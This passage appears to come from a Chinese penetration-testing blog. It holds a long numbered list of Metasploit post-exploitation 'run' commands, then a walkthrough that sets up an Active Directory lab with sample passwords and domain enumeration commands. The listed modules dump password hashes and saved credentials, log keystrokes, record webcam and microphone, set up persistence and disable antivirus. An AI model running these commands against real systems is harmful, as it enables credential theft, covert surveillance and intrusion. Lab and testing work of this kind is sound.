156. run post/firefox/gather/history
     
157. run post/firefox/gather/passwords
     
158. run post/firefox/gather/xss
     
159. run post/firefox/manage/webcam_chat
     
160. run post/hardware/automotive/can_flood
     
161. run post/hardware/automotive/canprobe
     
162. run post/hardware/automotive/getvinfo
     
163. run post/hardware/automotive/identifymodules
     
164. run post/hardware/automotive/malibu_overheat
     
165. run post/hardware/automotive/mazda_ic_mover
     
166. run post/hardware/automotive/pdt
     
167. run post/hardware/rftransceiver/rfpwnon
     
168. run post/hardware/rftransceiver/transmitter
     
169. run post/hardware/zigbee/zstumbler
     
170. run post/linux/busybox/enum_connections
     
171. run post/linux/busybox/enum_hosts
     
172. run post/linux/busybox/jailbreak
     
173. run post/linux/busybox/ping_net
     
174. run post/linux/busybox/set_dmz
     
175. run post/linux/busybox/set_dns
     
176. run post/linux/busybox/smb_share_root
     
177. run post/linux/busybox/wget_exec
     
178. run post/linux/dos/xen_420_dos
     
179. run post/linux/gather/checkcontainer
     
180. run post/linux/gather/checkvm
     
181. run post/linux/gather/ecryptfs_creds
     
182. run post/linux/gather/enum_commands
     
183. run post/linux/gather/enum_configs
     
184. run post/linux/gather/enum_containers
     
185. run post/linux/gather/enum_nagios_xi
     
186. run post/linux/gather/enum_network
     
187. run post/linux/gather/enum_protections
     
188. run post/linux/gather/enum_psk
     
189. run post/linux/gather/enum_system
     
190. run post/linux/gather/enum_users_history
     
191. run post/linux/gather/gnome_commander_creds
     
192. run post/linux/gather/gnome_keyring_dump
     
193. run post/linux/gather/hashdump
     
194. run post/linux/gather/mount_cifs_creds
     
195. run post/linux/gather/openvpn_credentials
     
196. run post/linux/gather/phpmyadmin_credsteal
     
197. run post/linux/gather/pptpd_chap_secrets
     
198. run post/linux/gather/tor_hiddenservices
     
199. run post/linux/manage/dns_spoofing
     
200. run post/linux/manage/download_exec
     
201. run post/linux/manage/iptables_removal
     
202. run post/linux/manage/pseudo_shell
     
203. run post/linux/manage/sshkey_persistence
     
204. run post/multi/escalate/aws_create_iam_user
     
205. run post/multi/escalate/cups_root_file_read
     
206. run post/multi/escalate/metasploit_pcaplog
     
207. run post/multi/gather/apple_ios_backup
     
208. run post/multi/gather/aws_ec2_instance_metadata
     
209. run post/multi/gather/aws_keys
     
210. run post/multi/gather/check_malware
     
211. run post/multi/gather/chrome_cookies
     
212. run post/multi/gather/dbvis_enum
     
213. run post/multi/gather/dns_bruteforce
     
214. run post/multi/gather/dns_reverse_lookup
     
215. run post/multi/gather/dns_srv_lookup
     
216. run post/multi/gather/docker_creds
     
217. run post/multi/gather/enum_hexchat
     
218. run post/multi/gather/enum_software_versions
     
219. run post/multi/gather/enum_vbox
     
220. run post/multi/gather/env
     
221. run post/multi/gather/fetchmailrc_creds
     
222. run post/multi/gather/filezilla_client_cred
     
223. run post/multi/gather/find_vmx
     
224. run post/multi/gather/firefox_creds
     
225. run post/multi/gather/gpg_creds
     
226. run post/multi/gather/grub_creds
     
227. run post/multi/gather/irssi_creds
     
228. run post/multi/gather/jboss_gather
     
229. run post/multi/gather/jenkins_gather
     
230. run post/multi/gather/lastpass_creds
     
231. run post/multi/gather/maven_creds
     
232. run post/multi/gather/multi_command
     
233. run post/multi/gather/netrc_creds
     
234. run post/multi/gather/pgpass_creds
     
235. run post/multi/gather/pidgin_cred
     
236. run post/multi/gather/ping_sweep
     
237. run post/multi/gather/remmina_creds
     
238. run post/multi/gather/resolve_hosts
     
239. run post/multi/gather/rsyncd_creds
     
240. run post/multi/gather/rubygems_api_key
     
241. run post/multi/gather/run_console_rc_file
     
242. run post/multi/gather/skype_enum
     
243. run post/multi/gather/ssh_creds
     
244. run post/multi/gather/thunderbird_creds
     
245. run post/multi/gather/tomcat_gather
     
246. run post/multi/gather/ubiquiti_unifi_backup
     
247. run post/multi/gather/wlan_geolocate
     
248. run post/multi/general/close
     
249. run post/multi/general/execute
     
250. run post/multi/general/wall
     
251. run post/multi/manage/autoroute
     
252. run post/multi/manage/dbvis_add_db_admin
     
253. run post/multi/manage/dbvis_query
     
254. run post/multi/manage/hsts_eraser
     
255. run post/multi/manage/multi_post
     
256. run post/multi/manage/open
     
257. run post/multi/manage/play_youtube
     
258. run post/multi/manage/record_mic
     
259. run post/multi/manage/screensaver
     
260. run post/multi/manage/screenshare
     
261. run post/multi/manage/set_wallpaper
     
262. run post/multi/manage/shell_to_meterpreter
     
263. run post/multi/manage/sudo
     
264. run post/multi/manage/system_session
     
265. run post/multi/manage/upload_exec
     
266. run post/multi/manage/zip
     
267. run post/multi/recon/local_exploit_suggester
     
268. run post/multi/recon/multiport_egress_traffic
     
269. run post/multi/recon/sudo_commands
     
270. run post/networking/gather/enum_brocade
     
271. run post/networking/gather/enum_cisco
     
272. run post/networking/gather/enum_f5
     
273. run post/networking/gather/enum_juniper
     
274. run post/networking/gather/enum_mikrotik
     
275. run post/networking/gather/enum_vyos
     
276. run post/osx/admin/say
     
277. run post/osx/capture/keylog_recorder
     
278. run post/osx/capture/screen
     
279. run post/osx/escalate/tccbypass
     
280. run post/osx/gather/apfs_encrypted_volume_passwd
     
281. run post/osx/gather/autologin_password
     
282. run post/osx/gather/enum_adium
     
283. run post/osx/gather/enum_airport
     
284. run post/osx/gather/enum_chicken_vnc_profile
     
285. run post/osx/gather/enum_colloquy
     
286. run post/osx/gather/enum_keychain
     
287. run post/osx/gather/enum_messages
     
288. run post/osx/gather/enum_osx
     
289. run post/osx/gather/hashdump
     
290. run post/osx/gather/password_prompt_spoof
     
291. run post/osx/gather/safari_lastsession
     
292. run post/osx/gather/vnc_password_osx
     
293. run post/osx/manage/mount_share
     
294. run post/osx/manage/record_mic
     
295. run post/osx/manage/sonic_pi
     
296. run post/osx/manage/vpn
     
297. run post/osx/manage/webcam
     
298. run post/solaris/escalate/pfexec
     
299. run post/solaris/escalate/srsexec_readline
     
300. run post/solaris/gather/checkvm
     
301. run post/solaris/gather/enum_packages
     
302. run post/solaris/gather/enum_services
     
303. run post/solaris/gather/hashdump
     
304. run post/windows/capture/keylog_recorder
     
305. run post/windows/capture/lockout_keylogger
     
306. run post/windows/escalate/droplnk
     
307. run post/windows/escalate/getsystem
     
308. run post/windows/escalate/golden_ticket
     
309. run post/windows/escalate/ms10_073_kbdlayout
     
310. run post/windows/escalate/screen_unlock
     
311. run post/windows/escalate/unmarshal_cmd_exec
     
312. run post/windows/gather/ad_to_sqlite
     
313. run post/windows/gather/arp_scanner
     
314. run post/windows/gather/avast_memory_dump
     
315. run post/windows/gather/bitcoin_jacker
     
316. run post/windows/gather/bitlocker_fvek
     
317. run post/windows/gather/bloodhound
     
318. run post/windows/gather/cachedump
     
319. run post/windows/gather/checkvm
     
320. run post/windows/gather/credentials/avira_password
     
321. run post/windows/gather/credentials/bulletproof_ftp
     
322. run post/windows/gather/credentials/coreftp
     
323. run post/windows/gather/credentials/credential_collector
     
324. run post/windows/gather/credentials/domain_hashdump
     
325. run post/windows/gather/credentials/dynazip_log
     
326. run post/windows/gather/credentials/dyndns
     
327. run post/windows/gather/credentials/enum_cred_store
     
328. run post/windows/gather/credentials/enum_laps
     
329. run post/windows/gather/credentials/enum_picasa_pwds
     
330. run post/windows/gather/credentials/epo_sql
     
331. run post/windows/gather/credentials/filezilla_server
     
332. run post/windows/gather/credentials/flashfxp
     
333. run post/windows/gather/credentials/ftpnavigator
     
334. run post/windows/gather/credentials/ftpx
     
335. run post/windows/gather/credentials/gpp
     
336. run post/windows/gather/credentials/heidisql
     
337. run post/windows/gather/credentials/idm
     
338. run post/windows/gather/credentials/imail
     
339. run post/windows/gather/credentials/imvu
     
340. run post/windows/gather/credentials/mcafee_vse_hashdump
     
341. run post/windows/gather/credentials/mdaemon_cred_collector
     
342. run post/windows/gather/credentials/meebo
     
343. run post/windows/gather/credentials/mremote
     
344. run post/windows/gather/credentials/mssql_local_hashdump
     
345. run post/windows/gather/credentials/nimbuzz
     
346. run post/windows/gather/credentials/outlook
     
347. run post/windows/gather/credentials/pulse_secure
     
348. run post/windows/gather/credentials/purevpn_cred_collector
     
349. run post/windows/gather/credentials/razer_synapse
     
350. run post/windows/gather/credentials/razorsql
     
351. run post/windows/gather/credentials/rdc_manager_creds
     
352. run post/windows/gather/credentials/securecrt
     
353. run post/windows/gather/credentials/skype
     
354. run post/windows/gather/credentials/smartermail
     
355. run post/windows/gather/credentials/smartftp
     
356. run post/windows/gather/credentials/spark_im
     
357. run post/windows/gather/credentials/sso
     
358. run post/windows/gather/credentials/steam
     
359. run post/windows/gather/credentials/teamviewer_passwords
     
360. run post/windows/gather/credentials/tortoisesvn
     
361. run post/windows/gather/credentials/total_commander
     
362. run post/windows/gather/credentials/trillian
     
363. run post/windows/gather/credentials/vnc
     
364. run post/windows/gather/credentials/windows_autologin
     
365. run post/windows/gather/credentials/winscp
     
366. run post/windows/gather/credentials/wsftp_client
     
367. run post/windows/gather/credentials/xshell_xftp_password
     
368. run post/windows/gather/dnscache_dump
     
369. run post/windows/gather/dumplinks
     
370. run post/windows/gather/enum_ad_bitlocker
     
371. run post/windows/gather/enum_ad_computers
     
372. run post/windows/gather/enum_ad_groups
     
373. run post/windows/gather/enum_ad_managedby_groups
     
374. run post/windows/gather/enum_ad_service_principal_names
     
375. run post/windows/gather/enum_ad_to_wordlist
     
376. run post/windows/gather/enum_ad_user_comments
     
377. run post/windows/gather/enum_ad_users
     
378. run post/windows/gather/enum_applications
     
379. run post/windows/gather/enum_artifacts
     
380. run post/windows/gather/enum_av_excluded
     
381. run post/windows/gather/enum_chrome
     
382. run post/windows/gather/enum_computers
     
383. run post/windows/gather/enum_db
     
384. run post/windows/gather/enum_devices
     
385. run post/windows/gather/enum_dirperms
     
386. run post/windows/gather/enum_domain
     
387. run post/windows/gather/enum_domain_group_users
     
388. run post/windows/gather/enum_domain_tokens
     
389. run post/windows/gather/enum_domain_users
     
390. run post/windows/gather/enum_domains
     
391. run post/windows/gather/enum_emet
     
392. run post/windows/gather/enum_files
     
393. run post/windows/gather/enum_hostfile
     
394. run post/windows/gather/enum_hyperv_vms
     
395. run post/windows/gather/enum_ie
     
396. run post/windows/gather/enum_logged_on_users
     
397. run post/windows/gather/enum_ms_product_keys
     
398. run post/windows/gather/enum_muicache
     
399. run post/windows/gather/enum_onedrive
     
400. run post/windows/gather/enum_patches
     
401. run post/windows/gather/enum_powershell_env
     
402. run post/windows/gather/enum_prefetch
     
403. run post/windows/gather/enum_proxy
     
404. run post/windows/gather/enum_putty_saved_sessions
     
405. run post/windows/gather/enum_services
     
406. run post/windows/gather/enum_shares
     
407. run post/windows/gather/enum_snmp
     
408. run post/windows/gather/enum_termserv
     
409. run post/windows/gather/enum_tokens
     
410. run post/windows/gather/enum_tomcat
     
411. run post/windows/gather/enum_trusted_locations
     
412. run post/windows/gather/enum_unattend
     
413. run post/windows/gather/file_from_raw_ntfs
     
414. run post/windows/gather/forensics/browser_history
     
415. run post/windows/gather/forensics/duqu_check
     
416. run post/windows/gather/forensics/enum_drives
     
417. run post/windows/gather/forensics/fanny_bmp_check
     
418. run post/windows/gather/forensics/imager
     
419. run post/windows/gather/forensics/nbd_server
     
420. run post/windows/gather/forensics/recovery_files
     
421. run post/windows/gather/hashdump
     
422. run post/windows/gather/local_admin_search_enum
     
423. run post/windows/gather/lsa_secrets
     
424. run post/windows/gather/make_csv_orgchart
     
425. run post/windows/gather/memory_grep
     
426. run post/windows/gather/netlm_downgrade
     
427. run post/windows/gather/ntds_grabber
     
428. run post/windows/gather/ntds_location
     
429. run post/windows/gather/outlook
     
430. run post/windows/gather/phish_windows_credentials
     
431. run post/windows/gather/psreadline_history
     
432. run post/windows/gather/resolve_sid
     
433. run post/windows/gather/reverse_lookup
     
434. run post/windows/gather/screen_spy
     
435. run post/windows/gather/smart_hashdump
     
436. run post/windows/gather/tcpnetstat
     
437. run post/windows/gather/usb_history
     
438. run post/windows/gather/win_privs
     
439. run post/windows/gather/wmic_command
     
440. run post/windows/gather/word_unc_injector
     
441. run post/windows/manage/add_user
     
442. run post/windows/manage/archmigrate
     
443. run post/windows/manage/change_password
     
444. run post/windows/manage/clone_proxy_settings
     
445. run post/windows/manage/delete_user
     
446. run post/windows/manage/download_exec
     
447. run post/windows/manage/driver_loader
     
448. run post/windows/manage/enable_rdp
     
449. run post/windows/manage/enable_support_account
     
450. run post/windows/manage/exec_powershell
     
451. run post/windows/manage/execute_dotnet_assembly
     
452. run post/windows/manage/forward_pageant
     
453. run post/windows/manage/hashcarve
     
454. run post/windows/manage/ie_proxypac
     
455. run post/windows/manage/inject_ca
     
456. run post/windows/manage/inject_host
     
457. run post/windows/manage/install_python
     
458. run post/windows/manage/install_ssh
     
459. run post/windows/manage/killav
     
460. run post/windows/manage/migrate
     
461. run post/windows/manage/mssql_local_auth_bypass
     
462. run post/windows/manage/multi_meterpreter_inject
     
463. run post/windows/manage/nbd_server
     
464. run post/windows/manage/peinjector
     
465. run post/windows/manage/persistence_exe
     
466. run post/windows/manage/portproxy
     
467. run post/windows/manage/powershell/build_net_code
     
468. run post/windows/manage/powershell/exec_powershell
     
469. run post/windows/manage/powershell/load_script
     
470. run post/windows/manage/pptp_tunnel
     
471. run post/windows/manage/priv_migrate
     
472. run post/windows/manage/pxeexploit
     
473. run post/windows/manage/reflective_dll_inject
     
474. run post/windows/manage/remove_ca
     
475. run post/windows/manage/remove_host
     
476. run post/windows/manage/rid_hijack
     
477. run post/windows/manage/rollback_defender_signatures
     
478. run post/windows/manage/rpcapd_start
     
479. run post/windows/manage/run_as
     
480. run post/windows/manage/run_as_psh
     
481. run post/windows/manage/sdel
     
482. run post/windows/manage/shellcode_inject
     
483. run post/windows/manage/sshkey_persistence
     
484. run post/windows/manage/sticky_keys
     
485. run post/windows/manage/vmdk_mount
     
486. run post/windows/manage/vss
     
487. run post/windows/manage/vss_create
     
488. run post/windows/manage/vss_list
     
489. run post/windows/manage/vss_mount
     
490. run post/windows/manage/vss_set_storage
     
491. run post/windows/manage/vss_storage
     
492. run post/windows/manage/wdigest_caching
     
493. run post/windows/manage/webcam
     
494. run post/windows/recon/computer_browser_discovery
     
495. run post/windows/recon/outbound_ports
     
496. run post/windows/recon/resolve_ip
     
497. run post/windows/wlan/wlan_bss_list
     
498. run post/windows/wlan/wlan_current_connection
     
499. run post/windows/wlan/wlan_disconnect
     
500. run post/windows/wlan/wlan_probe_request
     
501. run post/windows/wlan/wlan_profile
     
502. run powerdump
     
503. run prefetchtool
     
504. run process_memdump
     
505. run remotewinenum
     
506. run scheduleme
     
507. run schelevator
     
508. run schtasksabuse
     
509. run scraper
     
510. run screen_unlock
     
511. run screenspy
     
512. run search_dwld
     
513. run service_manager
     
514. run service_permissions_escalate
     
515. run sound_recorder
     
516. run srt_webdrive_priv
     
517. run uploadexec
     
518. run virtualbox_sysenter_dos
     
519. run virusscan_bypass
     
520. run vnc
     
521. run webcam
     
522. run winbf
     
523. run winenum
     
524. run wmic</code></pre>
     
525. <span class="cke_reset cke_widget_drag_handler_container" style="background: url(" https:="" csdnimg.cn="" release="" blog_editor_html="" release1.9.7="" ckeditor="" plugins="" widget="" images="" handle.png")="" rgba(220,="" 220,="" 0.5);="" top:="" 0px;="" left:="" 0px;"=""><img class="cke_reset cke_widget_drag_handler" data-cke-widget-drag-handler="1" height="15" role="presentation" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" title="点击并拖拽以移动" width="15"></span>

复制代码

​

Xor0ne

​目录如下所示：​​​
  
1.域控

windows server 2021 R2 DC

IP：192.168.159.136默认网关：192.168.159.2DNS服务器：192.168.159.2

​

step1：重命名该服务器为DC

​

step2：安装域

​

下一步（默认）

​

下一步（默认）

​

下一步（默认）

​

直到服务器角色，勾选Active Directory 域服务

​

下一步（默认）

​

下一步（默认），下一步（默认），安装

​

安装完毕，选择 “将此服务器提升为域控制器 ”。（也可以服务器管理器界面，右上角有个感叹号，那里也可以选择 “将此服务器提升为域控制器，如下图所示。）

​

step3：提升为域控制器

选择“添加新林”，设置根域名

​

输入目录服务还原模式(DSRM)密码（Administrator的密码）

@dministrator1999

​

下一步（默认）

​

下一步（默认）

​

下一步（默认）

​

下一步（默认）

​

下一步（默认）

​

安装

​

PS：安装的时候出现如下问题，发现是自己的密码填写错误，所以说密码一定要正确啊。

​

安装后将会自动重启，并且登录模式变成了域账号的登录模式 。

2.域内主机：

windows7 作为域内主机，所以设置DNS服务器为windows server 2012的IP地址（域控的地址）192.168.159.136

（我这里windows7配置的是双网卡机器，所以我选择域内机器时应选择的是与域控在同一网络内的网络作为域内主机。）

配置的域内主机windows7如下所示：

IP：192.168.159.6默认网关：192.168.159.2DNS服务器：192.168.159.2

​

​

step1: 成员主机入域

不断地下一步，如下输入xorone.com 域的域管理员密码

administrator/@dministrator2021

​

下一步默认，设置本机器名字与需要加入的域名（索然我域控那里的域名填的是小写，到那时这里填大写也没问题哦，，主要是到这里的时候就自动转换为大写了。。）

​

下一步（默认），按照提示填入有权限加入该域的某账户的名称与密码。

​

下一步（默认），账户权限。

​

step2: 查看域成员主机

​

step3: 添加域账号

右键域xorone.com

​

添加组织单位（安全部）

​

在安全部里面添加用户

​

设置密码

@nquanbu2021

​

​

step4: 登录域xorone

1. xorone\jiaozi
   
2. @nquanbu2021

复制代码

​

step5：域环境验证。

1. # 查看域内用户
   
2. net user /domain

复制代码

​

1. # 查看域管理员
   
2. net group "domain admins" /domain

复制代码

​

1. # 定位域控
   
2. nslookup
   
3. set type=all
   
4. ldap.tcp.dc._msdcs.DOMAIN_NAME

复制代码

​

​